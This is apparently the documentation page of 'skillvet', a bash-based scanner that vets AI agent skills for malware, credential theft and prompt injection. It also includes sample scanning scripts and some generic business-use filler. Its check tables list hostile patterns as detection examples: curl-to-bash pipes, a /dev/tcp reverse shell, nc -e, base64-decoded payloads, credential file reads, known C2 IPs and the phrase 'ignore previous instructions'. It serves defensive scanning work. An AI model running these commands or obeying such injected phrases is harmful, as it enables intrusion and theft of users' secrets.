skillvet

Security scanner for ClawHub/community skills — detects malware, credential theft, exfiltration, prompt injection, obfuscation, homograph attacks, ANSI injection, campaign-specific attack patterns, and more before you install. Use when installing skills from ClawHub or any public marketplace, reviewing third-party agent skills for safety, or vetting untrusted code before giving it to your AI agent. Triggers: install skill, audit skill, check skill, vet skill, skill security, safe install, is this skill safe.

Install via ClawdBot CLI:

```sh
clawdbot install oakencore/skillvet
```

Security scanner for agent skills. 48 critical checks, 8 warning checks. No dependencies — just bash and grep. Includes Tirith-inspired detection patterns, campaign signatures from Koi Security, Bitdefender, Snyk, and 1Password ClickFix patterns.
Safe install (installs, audits, auto-removes if critical):

```sh
bash skills/skillvet/scripts/safe-install.sh <skill-slug>
```

Audit an existing skill:

```sh
bash skills/skillvet/scripts/skill-audit.sh skills/some-skill
```

Audit all installed skills:

```sh
for d in skills/*/; do bash skills/skillvet/scripts/skill-audit.sh "$d"; done
```

JSON output (for automation):

```sh
bash skills/skillvet/scripts/skill-audit.sh --json skills/some-skill
```

SARIF output (for GitHub Code Scanning / VS Code):

```sh
bash skills/skillvet/scripts/skill-audit.sh --sarif skills/some-skill
```

Summary mode (one line per skill):

```sh
bash skills/skillvet/scripts/skill-audit.sh --summary skills/some-skill
```

Verbose mode (debug which checks run and what files are scanned):

```sh
bash skills/skillvet/scripts/skill-audit.sh --verbose skills/some-skill
```

Scan a remote skill without installing it:

```sh
bash skills/skillvet/scripts/scan-remote.sh <skill-slug>
```

Diff scan (only scan what changed between versions):

```sh
bash skills/skillvet/scripts/diff-scan.sh path/to/old-version path/to/new-version
```
Exit codes: 0 clean, 1 warnings only, 2 critical findings.
| Flag | Description |
|------|-------------|
| --json | JSON output for CI/dashboards |
| --sarif | SARIF v2.1.0 output for GitHub Code Scanning |
| --summary | One-line output per skill |
| --verbose | Show which checks run and which files are scanned |
| --exclude-self | Skip scan when scanning own source directory |
| --max-file-size N | Skip files larger than N bytes |
| --max-depth N | Limit directory traversal depth |
Create a .skillvetrc file in the skill directory to disable specific checks:

```
# Disable check #4 (obfuscation) and #20 (shortened URLs)
disable:4
disable:20
```

Or add inline comments to suppress individual lines:

```js
const url = "https://bit.ly/legit-link"; // skillvet-ignore
```

Install the git pre-commit hook to auto-scan skills before committing:

```sh
ln -sf ../../scripts/pre-commit-hook .git/hooks/pre-commit
```
Each finding has a severity weight (1-10). The aggregate risk score is included in JSON, SARIF, and summary output. Higher scores indicate more dangerous patterns:
| # | Check | Example |
|---|-------|---------|
| 1 | Known exfiltration endpoints | webhook.site, ngrok.io, requestbin |
| 2 | Bulk env variable harvesting | printenv \|, ${!*@} |
| 3 | Foreign credential access | ANTHROPIC_API_KEY, TELEGRAM_BOT_TOKEN in scripts |
| 4 | Code obfuscation | base64 decode, hex escapes, dynamic code generation |
| 5 | Path traversal / sensitive files | ../../, ~/.ssh, ~/.clawdbot |
| 6 | Data exfiltration via curl/wget | curl --data, wget --post with variables |
| 7 | Reverse/bind shells | /dev/tcp/, nc -e, socat |
| 8 | .env file theft | dotenv loading in scripts (not docs) |
| 9 | Prompt injection in markdown | "ignore previous instructions" in SKILL.md |
| 10 | LLM tool exploitation | Instructions to send/email secrets |
| 11 | Agent config tampering | Write/modify AGENTS.md, SOUL.md, clawdbot.json |
| 12 | Unicode obfuscation | Zero-width chars, RTL override, bidi control chars |
| 13 | Suspicious setup commands | curl piped to bash in SKILL.md |
| 14 | Social engineering | Download external binaries, paste-and-run instructions |
| 15 | Shipped .env files | .env files (not .example) in the skill |
| 16 | Homograph URLs (Tirith) | Cyrillic i vs Latin i in hostnames |
| 17 | ANSI escape sequences (Tirith) | Terminal escape codes in code/data files |
| 18 | Punycode domains (Tirith) | xn-- prefixed IDN-encoded domains |
| 19 | Double-encoded paths (Tirith) | %25XX percent-encoding bypass |
| 20 | Shortened URLs (Tirith) | bit.ly, t.co, tinyurl.com hiding destinations |
| 21 | Pipe-to-shell | curl \| bash (HTTP and HTTPS) |
| 22 | String construction evasion | String.fromCharCode, getattr, dynamic call assembly |
| 23 | Data flow chain analysis | Same file reads secrets, encodes, AND sends network requests |
| 24 | Time bomb detection | Date.now() > timestamp, setTimeout(fn, 86400000) |
| 25 | Known C2/IOC IP blocklist | 91.92.242.30, 54.91.154.110 (known AMOS C2 servers) |
| 26 | Password-protected archives | "extract using password: openclaw" — AV evasion |
| 27 | Paste service payloads | glot.io, pastebin.com hosting malicious scripts |
| 28 | GitHub releases binary downloads | Fake prerequisites pointing to .zip/.exe on GitHub |
| 29 | Base64 pipe-to-interpreter | echo '...' \| base64 -D \| bash — primary macOS vector |
| 30 | Subprocess + network commands | hidden pipe-to-shell in Python/JS code |
| 31 | Fake URL misdirection (warning) | decoy URL before real payload |
| 32 | Process persistence + network | nohup curl ... & — backdoor with network access |
| 33 | Fake prerequisite pattern | "Prerequisites" section with sketchy external downloads |
| 34 | xattr/chmod dropper | macOS Gatekeeper bypass: download, xattr -c, chmod +x, execute |
| 35 | ClickFix download+execute chain | curl -o /tmp/x && chmod +x && ./x, open -a with downloads |
| 36 | Suspicious package sources | pip install git+https://..., npm from non-official registries |
| 37 | Staged installer pattern | Fake dependency names like openclaw-core, some-lib |
| 38 | Fake OS update social engineering | "Apple Software Update required for compatibility" |
| 39 | Known malicious ClawHub actors | zaycv, Ddoy233, Sakaen736jih, Hightower6eu references |
| 40 | Bash /dev/tcp reverse shell | bash -i >/dev/tcp/IP/PORT 0>&1 (AuthTool pattern) |
| 41 | Nohup backdoor | nohup bash -c '...' >/dev/null with network commands |
| 42 | Python reverse shell | socket.connect + dup2, pty.spawn('/bin/bash') |
| 43 | Terminal output disguise | Decoy "downloading..." message before malicious payload |
| 44 | Credential file access | Direct reads of .env, .pem, .aws/credentials |
| 45 | TMPDIR payload staging | AMOS pattern: drop malware to $TMPDIR then execute |
| 46 | GitHub raw content execution | curl raw.githubusercontent.com/... \| bash |
| 47 | Echo-encoded payloads | Long base64 strings echoed and piped to decoders |
| 48 | Typosquat skill names | clawdhub-helper, openclaw-cli, skillvet1 |
| # | Check | Example |
|---|-------|---------|
| W1 | Unknown external tool requirements | Non-standard CLI tools in install instructions |
| W2 | Subprocess execution | child_process, execSync, spawn, subprocess |
| W3 | Network requests | axios, fetch, requests imports |
| W4 | Minified/bundled files | First line >500 chars — can't audit |
| W5 | Filesystem write operations | writeFile, open('w'), fs.append |
| W6 | Insecure transport | curl -k, verify=False — TLS disabled |
| W7 | Docker untrusted registries | Non-standard image sources |
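The pieces described above (grep-style checks, the .skillvetrc `disable:N` lines, the inline `skillvet-ignore` marker, the per-finding severity weight that sums into a risk score, and the 0/1/2 exit-code convention) fit together in a small way. The following POSIX sh sketch is an added example, not skillvet's own code (the project's scripts are not shown on this page): it implements a constructed subset of the check table (entries 1, 20, 21 and W3, with assumed weights) and audits a constructed sample skill, so the whole model can be run end to end offline.

```shell
#!/bin/sh
# Added example, not skillvet's own code: a miniature audit in POSIX sh that
# mirrors the model described on this page (grep -E checks with severity
# weights, .skillvetrc "disable:N" lines, inline "skillvet-ignore" markers,
# an aggregate risk score and the 0/1/2 exit-code convention).
# Check ids, weights and patterns below are a constructed subset, not the
# project's real rule set.

# Print the check ids listed as "disable:N" in DIR/.skillvetrc, one per line.
disabled_checks() {
  [ -f "$1/.skillvetrc" ] || return 0
  sed -n 's/^disable:\([0-9A-Za-z]*\)[[:space:]]*$/\1/p' "$1/.skillvetrc"
}

# True when check id $1 appears in $SKILLVET_DISABLED (set by audit_skill).
is_disabled() {
  printf '%s\n' "$SKILLVET_DISABLED" | grep -qx "$1"
}

# run_check ID LEVEL WEIGHT ERE FILE: print one tab-separated finding per
# matching line, skipping lines that carry an inline "skillvet-ignore" marker.
run_check() {
  is_disabled "$1" && return 0
  grep -nE "$4" "$5" 2>/dev/null | grep -v 'skillvet-ignore' |
    while IFS= read -r hit; do
      printf '%s\t%s\t%s\t%s:%s\n' "$2" "$1" "$3" "$5" "$hit"
    done
  return 0
}

# Constructed subset of the check table: three critical checks, one warning.
run_all_checks() {
  run_check 1  critical 10 'webhook\.site|ngrok\.io|requestbin' "$1"
  run_check 21 critical 9  'curl[^|]*[|][[:space:]]*(ba)?sh' "$1"
  run_check 20 critical 3  'bit\.ly|t\.co|tinyurl\.com' "$1"
  run_check W3 warning  1  'import[[:space:]]+requests|require\("axios"\)|fetch\(' "$1"
}

# audit_skill DIR: print findings plus a summary line; return 2 on any
# critical finding, 1 on warnings only, 0 when clean.
audit_skill() {
  dir=${1%/}
  SKILLVET_DISABLED=$(disabled_checks "$dir")
  results=$(mktemp)
  find "$dir" -type f ! -name .skillvetrc | sort | while IFS= read -r f; do
    run_all_checks "$f"
  done > "$results"
  cat "$results"
  # Aggregate risk score = sum of the weights of all surviving findings.
  awk -F'\t' '{ score += $3; if ($1 == "critical") c++; else w++ }
    END { printf "score=%d critical=%d warning=%d\n", score, c, w }' "$results"
  crit=$(grep -c '^critical' "$results" || :)
  warn=$(grep -c '^warning' "$results" || :)
  rm -f "$results"
  [ "$crit" -gt 0 ] && return 2
  [ "$warn" -gt 0 ] && return 1
  return 0
}

# Build a constructed sample skill (not a real ClawHub skill) in a temp dir:
# a pipe-to-shell install line, a shortened URL silenced via .skillvetrc,
# a fetch() silenced inline, and a fetch() to a known exfiltration endpoint.
make_sample_skill() {
  d=$(mktemp -d)
  cat > "$d/SKILL.md" <<'EOF'
# sample-skill
Install: curl -sSL https://example.com/setup.sh | bash
EOF
  cat > "$d/index.js" <<'EOF'
const short = "https://bit.ly/docs-link";
fetch("https://api.example.com/v1/status"); // skillvet-ignore
fetch("https://webhook.site/abc123");
EOF
  printf 'disable:20\n' > "$d/.skillvetrc"
  printf '%s\n' "$d"
}

sample=$(make_sample_skill)
rc=0; audit_skill "$sample" || rc=$?
echo "exit code: $rc"
rm -rf "$sample"
```

On the sample, the shortened-URL hit is dropped by `disable:20`, the first `fetch(` is dropped by its `skillvet-ignore` comment, and the remaining two critical findings (weights 9 and 10) plus one warning (weight 1) give a risk score of 20 and exit code 2. Findings are written to a temp file rather than accumulated in shell variables because the `find | while` loop runs in a subshell in POSIX sh.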
Scanned file types: .md, .js, .ts, .tsx, .jsx, .py, .sh, .bash, .rs, .go, .rb, .c, .cpp, .json, .yaml, .yml, .toml, .txt, .env, Dockerfile, Makefile, pom.xml, .gradle.
Binary files are automatically skipped. Symlinks are followed.
Works on Linux and macOS. Unicode checks (#12, #16, #17) use grep -P where available, falling back to perl on systems without Perl-compatible regex (e.g., stock macOS). If neither is available, those checks are silently skipped.
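The Unicode checks above depend on grep -P or perl being present. As an added example, not part of skillvet and not the route the project takes, the functions below show a third option: matching the UTF-8 byte sequences of the zero-width, bidi and Cyrillic code points with plain grep -E under LC_ALL=C, which works wherever grep exists. The byte values in the comments are the standard UTF-8 encodings; the function names and the sample files are assumptions for the demo.

```shell
#!/bin/sh
# Added example, not skillvet's own code. The scanner uses grep -P and falls
# back to perl for its Unicode checks; this shows a portable alternative that
# matches the UTF-8 byte sequences directly with grep -E under LC_ALL=C.
# Each scan function prints matching lines (with line numbers) and returns 2
# on a hit, 0 when the file is clean, mirroring the page's exit-code scheme.

# Zero-width and bidi control characters (check #12), as UTF-8 bytes:
#   U+200B..U+200D  zero width space / non-joiner / joiner   E2 80 8B..8D
#   U+202A..U+202E  bidi embeddings and overrides            E2 80 AA..AE
#   U+2060          word joiner                              E2 81 A0
#   U+2066..U+2069  bidi isolates                            E2 81 A6..A9
#   U+FEFF          zero width no-break space (BOM)          EF BB BF
# printf turns the octal escapes into raw bytes; in the C locale grep treats
# every byte as one character, so [\252-\256] is a plain byte range.
zero_width_pattern() {
  printf '\342\200[\213-\215\252-\256]|\342\201[\240\246-\251]|\357\273\277'
}

# Terminal escape sequences (check #17): ESC '[' parameters final-letter.
ansi_pattern() {
  printf '\033[[][0-9;?]*[A-Za-z]'
}

# Cyrillic letters inside a URL host (check #16): U+0400..U+04FF encode as
# two bytes with lead byte D0..D3, so such a byte before the first '/' of
# the host part marks a homograph candidate.
homograph_pattern() {
  printf 'https?://[^[:space:]/]*[\320-\323]'
}

# scan_with PATTERN_FN FILE: run the pattern produced by PATTERN_FN over FILE.
scan_with() {
  LC_ALL=C grep -nE "$("$1")" "$2" && return 2
  return 0
}
scan_zero_width() { scan_with zero_width_pattern "$1"; }
scan_ansi()       { scan_with ansi_pattern "$1"; }
scan_homograph()  { scan_with homograph_pattern "$1"; }

# Constructed sample files (not from any real skill) exercising each check.
make_samples() {
  d=$(mktemp -d)
  printf 'plain ascii text, https://example.com/docs\n' > "$d/clean.md"
  printf 'visit exa\342\200\213mple.com\n' > "$d/zero-width.md"
  printf 'var s = "abc\342\200\256cba";\n' > "$d/bidi.js"
  printf 'echo "\033[2Jdownloading..."\n' > "$d/ansi.sh"
  printf 'https://g\320\276ogle.com/login\n' > "$d/homograph.md"
  printf '%s\n' "$d"
}

samples=$(make_samples)
for f in "$samples"/*; do
  rc=0
  scan_zero_width "$f" || rc=$?
  scan_ansi "$f" || rc=$?
  scan_homograph "$f" || rc=$?
  echo "$f: exit $rc"
done
rm -rf "$samples"
```

Because the patterns are built from bytes rather than code points, they must always run under LC_ALL=C; in a UTF-8 locale grep would reinterpret the bracket ranges as multibyte characters and the matches would silently change.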
The C2 IP blocklist in check #25 is based on known indicators from:
To update IOCs, edit the KNOWN_IPS entry in scripts/patterns.b64 (base64-encoded regex pattern).
A .github/workflows/test.yml is included — runs the test suite on both Ubuntu and macOS on push/PR.

```yaml
- name: Run skillvet
  run: bash scripts/skill-audit.sh --sarif skills/some-skill > results.sarif || true
- name: Upload SARIF
  uses: github/codeql-action/upload-sarif@v3
  with:
    sarif_file: results.sarif
```
Static analysis only. English-centric prompt injection patterns. Minified JS is flagged but not deobfuscated. A clean scan raises the bar but doesn't guarantee safety.
The scanner flags itself when audited — its own patterns contain the strings it detects. Use --exclude-self to skip self-scanning in CI.
Generated Mar 1, 2026
Organizations using AI agent platforms like ClawHub can deploy Skillvet to automatically scan and vet skills from public marketplaces before installation. This prevents malware, credential theft, and prompt injection attacks, ensuring only safe skills are integrated into their AI agents, reducing security risks in enterprise environments.
Companies in regulated industries such as finance or healthcare use Skillvet to audit installed AI agent skills for compliance with security policies. The tool's JSON and SARIF outputs facilitate automated reporting and integration into CI/CD pipelines, helping meet regulatory requirements and internal security standards.
Development teams adopt Skillvet as part of their secure coding practices to scan custom AI agent skills for vulnerabilities like obfuscation or homograph attacks. It serves as an educational tool, highlighting common attack patterns and enabling proactive remediation during the development lifecycle.
Security operations centers utilize Skillvet to investigate suspected compromises in AI agent ecosystems. By scanning for indicators of compromise such as reverse shells or known C2 IPs, teams can quickly identify and isolate malicious skills, minimizing damage and preventing data exfiltration.
Offer Skillvet as a free open-source tool for basic scanning, with premium features like advanced threat intelligence feeds, priority support, and enterprise dashboards for a subscription fee. This model attracts individual users while monetizing organizations needing enhanced security and reporting capabilities.
Provide consulting and integration services to embed Skillvet into corporate AI agent platforms, offering custom rule sets, training, and ongoing support. This model targets large enterprises seeking tailored security solutions and compliance assistance, generating revenue through project-based fees and retainers.
Partner with AI agent marketplaces like ClawHub to offer Skillvet as a certification service for listed skills. Revenue is generated through certification fees per skill or a revenue share from marketplace transactions, ensuring only vetted skills are available and building trust among users.
💬 Integration Tip
Integrate Skillvet into CI/CD pipelines using its JSON output for automated security checks, and set up pre-commit hooks to scan skills before code commits to catch vulnerabilities early.